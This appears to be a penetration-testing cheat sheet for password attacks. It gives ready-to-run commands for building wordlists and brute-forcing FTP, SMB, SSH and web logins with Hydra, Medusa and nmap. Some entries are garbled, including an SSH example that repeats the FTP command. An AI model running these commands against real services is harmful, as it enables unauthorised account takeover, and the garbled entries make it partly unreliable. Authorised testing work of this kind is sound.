Default Credentials
Wordlists
Wordlist Generation
CeWL
Copy cewl example.com -m 3 -w wordlist.txt -m <length>: Minimum word length.
-w <file>: Write the output to <file>.
Crunch
Simple wordlist.
Copy crunch 6 12 abcdefghijk1234567890 \@\! -o wordlist.txt String permutation.
Copy crunch 1 1 -p target pass 2019 -o wordlist.txt Patterns.
Copy crunch 9 9 0123456789 -t @target@@ -o wordlist.txt <min-len>: The minimum string length.
<max-len>: The maximum string length.
<charset>: Characters set.
-o <file>: Specifies the file to write the output to.
-p <charset or strings>: Permutation.
-t <pattern>: Specifies a pattern, eg: @@pass@@@@.
@ will insert lower case characters
, will insert upper case characters
Password Profiling
CUPP
-i: Interactive uestions for user password profiling.
Word Mangling
john
Copy john --wordlist=wordlist.txt --rules --stdout --wordlist <file>: Wordlist mode, read words from <file> or stdin.
--rules[:CustomRule]: Enable word mangling rules. Use default or add [:CustomRule].
--stdout: Output candidate passwords.
Note: Custom rules can be appended to John’s configuration file john.conf.
Services
FTP
Hydra
Copy hydra -v -l ftp -P /usr/share/wordlists/rockyou.txt -f 10.0.0.3 ftp -l <user>: login with user name.
-P <passwords file>: login with passwords from file.
-f: exit after the first found user/password pair.
SMB
Hydra
Copy hydra -v -t1 -l Administrator -P /usr/share/wordlists/rockyou.txt -f 10.0.0.3 smb -t <tasks>: run <tasks> number of connects in parallel. Default: 16.
-l <user>: login with user name.
-P <passwords file>: login with passwords from file.
-f: exit after the first found user/password pair.
NSE Script
Copy sudo nmap --script smb-brute -p U:137,T:139 10.0.0.3 SSH
Hydra
Copy hydra -v -l ftp -P /usr/share/wordlists/rockyou.txt -f 10.0.0.3 ftp Web Applications
HTTP Basic Auth
Copy hydra -L users.txt -P /usr/share/wordlists/rockyou.txt example.com http-head /admin/ HTTP Digest
Copy hydra -L users.txt -P /usr/share/wordlists/rockyou.txt example.com http-get /admin/ HTTP POST Form
Copy hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed" -l <user>: login with user name.
-L <users-file>: login with users from file.
-P <passwords file>: login with passwords from file.
http-head | http-get | http-post-form: service to attack.
HTTP Authenticated POST Form
To add the session ID to the options string, simply append the Cookie header with the session ID, like so: :H=Cookie\: security=low; PHPSESSID=if0kg4ss785kmov8bqlbusva3v
Copy hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed:H=Cookie\: PHPSESSID=if0kg4ss785kmov8bqlbusva3v" Miscellaneous
Combo (Colon Separated) Lists
Hydra
Use a colon separated login:pass format, instead of -L/-P options.
Copy hydra -v -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt -f 10.0.0.3 ftp -C <user:pass file>: colon-separated “login:pass” format.
-f: exit after the first found user/password pair.
Medusa
The combo files used by Medusa should be in the format host:username:password, separated by colons. If any of these three values are missing, the relevant information should be provided either as a global value or as a list in a separate file.
Copy sed s/^/:/ /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt > /tmp/cplist.txt
medusa -C /tmp/cplist.txt -h 10.0.0.3 -M ftp -u <user>: login with user name.
-P <passwords file>: login with password from file.
-h: target hostname or IP address.